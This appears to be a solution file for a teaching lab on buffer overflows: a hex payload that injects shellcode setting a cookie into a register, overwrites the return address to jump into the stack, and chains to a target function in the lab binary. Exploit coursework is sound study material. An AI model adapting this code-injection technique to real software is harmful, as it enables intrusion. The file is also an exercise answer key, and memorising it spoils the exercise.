/* cookie: 0x33fca2a6 */
/* `ret`: 0xc3 */
/* `mov $0xXXXXXXXX %edi`: 0xbfXXXXXXXX */
/* rsp before Gets(): 0x556769d8 */



/* 556769d8: */   bf a6 a2 fc 33 c3 00 00    /* rsp */
/* 556769e0: */   00 00 00 00 00 00 00 00    /* rsp + 8 */
/* 556769e8: */   00 00 00 00 00 00 00 00    /* rsp + 16 */
/* 556769f0: */   00 00 00 00 00 00 00 00    /* rsp + 24 */
/* 556769f8: */   00 00 00 00 00 00 00 00    /* rsp + 32 */
/* 55676a00: */   d8 69 67 55 00 00 00 00    /* ret addr */
/* 55676a08: */   e2 17 40 00 00 00 00 00    /* ret addr + 8 */
